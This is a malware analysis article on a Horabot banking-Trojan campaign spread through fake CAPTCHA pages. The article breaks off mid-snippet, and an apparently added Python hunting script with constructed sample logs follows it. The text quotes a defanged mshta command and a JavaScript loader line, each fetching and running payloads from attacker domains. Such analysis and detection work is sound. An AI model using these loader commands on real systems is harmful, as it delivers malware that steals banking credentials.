Tags: malware, high, Banking Trojan, Information Stealer, Loader, Horabot

Mar 18, 2026 • Domenico Caldarella, Mateus Salgado

The SOC Files: Time to “Sapecar”. Unpacking a new Horabot campaign in Mexico

Source: Kaspersky Securelist
Category: malware
Severity: high

Executive Summary

Kaspersky SOC identified an active Horabot campaign targeting users in Mexico. This complex operation utilizes a banking Trojan bundle distributed via a fake CAPTCHA page that tricks victims into executing malicious mshta commands. The attack chain employs server-side polymorphism, heavy obfuscation, and anti-VM techniques to evade detection. Once established, the malware gathers system information and downloads additional components, including AutoIt executables, to facilitate financial theft and further compromise. Although Kaspersky Endpoint Security successfully intercepted this specific incident, the campaign remains active. Organizations should monitor for suspicious script execution, specifically mshta and VBScript activities originating from browser interactions. Enhanced user awareness regarding fake CAPTCHA lures is critical. Security teams are advised to hunt for polymorphic scripts and unauthorized PowerShell commands within their environments to mitigate the risk of data exfiltration and financial loss associated with this persistent threat.

Summary

Kaspersky SOC uncovered and analyzed a complex Horabot campaign in Mexico. In this article we share insights into how it is unleashed and how to hunt for this threat.

Published Analysis

Introduction

In this installment of our SOC Files series, we will walk you through a targeted campaign that our MDR team identified and hunted down a few months ago. It involves a threat known as Horabot, a bundle consisting of an infamous banking Trojan, an email spreader, and a notably complex attack chain. Although previous research has documented Horabot campaigns (here and here), our goal is to highlight how active this threat remains and to share some aspects not covered in those analyses.

The starting point

As usual, our story begins with an alert that popped up in one of our customers' environments. The rule that triggered it is generic yet effective at detecting suspicious mshta activity.

The case progressed from that initial alert, but fortunately ended on a positive note. Kaspersky Endpoint Security intervened, terminated the malicious process (via its proactive defense module (PDM)) and removed the related files before the threat could progress any further. The incident was then brought up for discussion at one of our weekly meetings. That was enough to spark the curiosity of one of our analysts, who then delved deeper into the tradecraft behind this campaign.

The attack chain

After some research and a lot of poking around in the adversary infrastructure, our team managed to map out the end-to-end kill chain. In this section, we will break down each stage and explain how the operation unfolds.

Stage 1: Initial lure

Following the breadcrumbs observed in the reported incident, the activity appears to begin with a standard fake CAPTCHA page. In the incident mentioned above, this page was located at the URL https://evs.grupotuis[.]buzz/0capcha17/ (details about its content can be found here).

Figure: Fake CAPTCHA page at the URL https://evs.grupotuis[.]buzz/0capcha17/

Similar to the Lumma and Amadey cases, this page instructs the user to open the Run dialog, paste a malicious command into it and then run it. Once deceived, the victim pastes a command similar to the one below:

    mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta

This command retrieved and executed an HTA file that contained the following:

It is essentially a small loader. When executed, it opens a blank window, then immediately pulls and runs an external JavaScript payload hosted on the attacker's domain. The body contains a large block of random, meaningless text that serves purely as filler.

Stage 2: A pinch of server-side polymorphism

The payload loaded by the HTA file dynamically creates a new <script> element, sets its source to an external VBScript hosted on another attacker-controlled domain, and injects it into the <head> section of a page hardcoded in the HTA. You can see the full content of the page in the box below. Once appended, the external VBScript is immediately fetched and executed, advancing the attack to its next stage.

    var scriptEle = document.createElement("script");
    scriptEle.setAttribute("src", "https://pdj.gruposhac[.]lat/g1/ld1/");
    scriptEle.setAttribute("type", "text/vbscript");
    document.getElementsByTagName('head')[0].appendChild(scriptEle);

The next-stage VBS content resembles the example shown below. During our analysis, we observed the use of server-side polymorphism: each access to the same resource returned a slightly different version of the code while preserving the same functionality. The script is obfuscated and employs a custom string encoding routine. Below is a more readable version with its strings decoded and replaced using a small Python script that replicates the decode_str() routine. The script performs pretty much the same function as the initial HTA file. It reaches a JavaScript loader that injects and executes another polymorphic VBScript.

    var scriptEle =...
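The hunting guidance in this analysis (alert on mshta started with a remote URL, then look for script hosts spawned beneath it) can be expressed as a small triage check over process-creation telemetry. The Python below is an added example, not Kaspersky's detection rule or any of the article's code; the JSON event shape and field names are constructed, every record is made up, and the assumption that a command pasted into the Run dialog shows up as a child of explorer.exe is mine. The first record replays the mshta command quoted above, kept in its defanged form.

```python
"""Triage check for fake-CAPTCHA style mshta chains in process-creation events.

Added example, not the article's code. Event format and records are constructed.
"""
import json
import re
from dataclasses import dataclass

# Constructed process-creation events in a Sysmon-like JSON-lines shape.
# Record 4012 replays the Run-dialog command quoted in the article (defanged);
# 4100 is a constructed follow-on stage; 5200 and 5300 are benign controls.
SAMPLE_LOG = r"""
{"pid": 4012, "ppid": 1220, "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmd": "mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta"}
{"pid": 4100, "ppid": 4012, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\mshta.exe", "cmd": "powershell -w hidden -c <constructed placeholder>"}
{"pid": 5200, "ppid": 1220, "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmd": "mshta C:\\Tools\\inventory.hta"}
{"pid": 5300, "ppid": 900, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\svchost.exe", "cmd": "powershell -File C:\\Scripts\\backup.ps1"}
"""

URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
# Script hosts that the HTA loader hands off to in the chain described above.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumption: commands pasted into the Run dialog are spawned by explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}


@dataclass
class Finding:
    pid: int
    image: str
    reason: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text: str) -> list[dict]:
    """Parse JSON-lines process-creation events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def has_ancestor(event: dict, by_pid: dict, name: str, max_depth: int = 8) -> bool:
    """Walk the parent chain (bounded) looking for a process image named `name`."""
    current = event
    for _ in range(max_depth):
        parent = by_pid.get(current["ppid"])
        if parent is None:
            return False
        if basename(parent["image"]) == name:
            return True
        current = parent
    return False


def hunt(events: list[dict]) -> list[Finding]:
    """Flag mshta fetching a remote HTA and any script host descended from it."""
    by_pid = {e["pid"]: e for e in events}
    findings: list[Finding] = []
    for e in events:
        image = basename(e["image"])
        parent = basename(e["parent_image"])
        cmd = e["cmd"]
        if image == "mshta.exe" and URL_RE.search(cmd):
            # Local .hta files are common in admin tooling; a URL argument is not.
            reason = "mshta.exe executing a remote HTA"
            if parent in INTERACTIVE_PARENTS:
                reason += ", launched from an interactive shell (Run-dialog pattern)"
            findings.append(Finding(e["pid"], image, reason, cmd))
        elif image in SCRIPT_HOSTS and has_ancestor(e, by_pid, "mshta.exe"):
            findings.append(Finding(e["pid"], image, "script host spawned under mshta.exe", cmd))
    return findings


def hunt_log(text: str) -> list[Finding]:
    """Convenience wrapper: parse JSON lines and run the hunt."""
    return hunt(parse_events(text))


if __name__ == "__main__":
    for f in hunt_log(SAMPLE_LOG):
        print(f"pid={f.pid} {f.image}: {f.reason}\n    {f.command_line}")
```

Run as-is, the script reports the replayed mshta launch and the constructed PowerShell child beneath it, while the local-HTA launch and the service-spawned PowerShell produce no finding. The ancestor walk is bounded so a malformed or cyclic parent chain cannot hang the check; in a real pipeline the parent lookup would come from the EDR's process tree rather than from a dictionary built over the same batch.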

Linked Entities

  • Horabot